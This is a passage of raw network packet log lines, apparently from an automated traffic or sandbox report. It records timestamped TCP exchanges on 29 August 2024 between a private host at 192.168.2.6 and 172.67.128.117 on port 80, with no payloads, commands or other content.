                                    Aug 29, 2024 12:02:36.382263899 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.382263899 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.382273912 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382289886 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382304907 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382307053 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.382307053 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.382316113 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382330894 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382339001 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.382345915 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382358074 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382359028 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.382371902 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382378101 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.382385969 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.382416964 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.382416964 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.416779995 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.416825056 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.416837931 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.416851997 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.416871071 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.416884899 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.416901112 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.416917086 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.416913986 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.416913986 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.416963100 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.416963100 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.470181942 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470210075 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470221043 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470232964 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470247030 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470263958 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470277071 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470287085 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470299959 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470314026 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470328093 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470344067 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470371962 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.470371962 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.470392942 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470405102 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.470477104 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.470496893 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470509052 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470520020 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470535040 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470551014 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470556021 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.470565081 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470577955 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470582008 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.470593929 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470593929 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.470654011 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.470654011 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.470786095 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470799923 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470810890 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470824957 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470838070 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470843077 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.470849991 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470880985 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.470894098 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.470935106 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470946074 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470957041 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470969915 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470984936 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.470988035 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.470999956 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471004009 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.471025944 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.471055031 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.471180916 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471194029 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471204996 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471218109 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471230984 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471240997 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471256971 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471256971 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.471256971 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.471270084 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471278906 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.471283913 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471314907 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.471332073 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.471424103 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471436024 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471486092 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.471488953 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471497059 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471508026 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471519947 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471532106 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471544027 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.471569061 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471579075 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.471581936 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471642017 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.471734047 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471745968 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471756935 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471770048 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471781969 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471795082 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471800089 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.471800089 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.471806049 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471817970 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471828938 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471843004 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471853018 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471862078 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.471862078 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.471862078 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.471864939 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471884012 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.471915007 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.471915007 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.472038031 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472120047 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.472201109 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472213030 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472223997 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472237110 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472245932 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472258091 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472270012 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472273111 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.472273111 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.472281933 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472292900 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472304106 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472307920 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.472307920 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.472316027 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472376108 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.472537994 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472551107 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472560883 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472580910 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472584963 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.472593069 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472599030 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.472604036 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472615957 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472626925 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472629070 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.472639084 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472651005 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472659111 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.472662926 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472673893 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472675085 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.472686052 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472704887 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.472739935 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.472903013 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472920895 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472933054 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472944975 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472958088 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.472958088 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472966909 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.472970963 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.472990036 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.473007917 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.473007917 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.473058939 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.473157883 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.473170042 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.473182917 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.473196030 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.473207951 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.473212004 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.473218918 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.473222017 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.473231077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.473258018 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.473341942 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.507473946 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.507493019 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.507513046 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.507525921 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.507535934 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.507548094 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.507561922 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.507575035 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.507630110 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.507630110 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.507700920 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.560652971 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.560679913 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.560692072 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.560702085 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.560715914 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.560729027 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.560740948 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.560754061 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.560780048 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.560834885 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.560837984 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.560873985 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.560944080 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.560956955 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.560969114 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.560980082 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.560987949 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.561008930 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561013937 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.561022043 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561033010 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.561036110 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561047077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561058998 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561062098 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.561070919 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561083078 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561093092 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.561098099 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561121941 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.561150074 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.561165094 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561177015 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561192036 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561203003 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.561207056 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561219931 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561222076 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.561235905 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.561264992 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.561285973 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561300039 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561331034 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.561434031 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561446905 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561460018 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561470985 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561476946 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.561482906 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561495066 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561501980 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.561506033 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561520100 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561530113 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.561549902 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.561556101 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561585903 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561592102 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.561629057 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.561773062 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561785936 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561798096 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561809063 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561820030 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561825037 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.561825037 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.561832905 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561842918 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561853886 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561866045 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561876059 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.561877012 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561888933 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.561912060 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.561912060 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.561940908 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.562017918 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562030077 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562055111 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.562069893 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.562103987 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562114954 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562125921 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562136889 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562139988 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.562148094 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562158108 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562160969 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.562170982 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562189102 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.562208891 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.562341928 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562354088 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562365055 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562378883 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.562383890 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562396049 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562406063 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.562407017 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562418938 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562431097 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562436104 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.562443018 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562453985 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.562472105 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.562496901 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.562639952 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562680960 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.562766075 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562777996 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562788963 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562800884 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562803030 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.562812090 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562822104 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.562824011 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562834978 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562839985 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.562853098 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562870026 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.562887907 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.562916994 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562928915 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562937975 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562951088 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562962055 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.562969923 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562982082 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562994003 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.562995911 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.563008070 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.563010931 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.563019991 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.563039064 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.563066959 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.563175917 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.563189030 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.563213110 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.563244104 CEST4971780192.168.2.6172.67.128.117
                                    Aug 29, 2024 12:02:36.563306093 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.563318968 CEST8049717172.67.128.117192.168.2.6
                                    Aug 29, 2024 12:02:36.563337088 CEST8049717172.67.128.117192.168.2.6
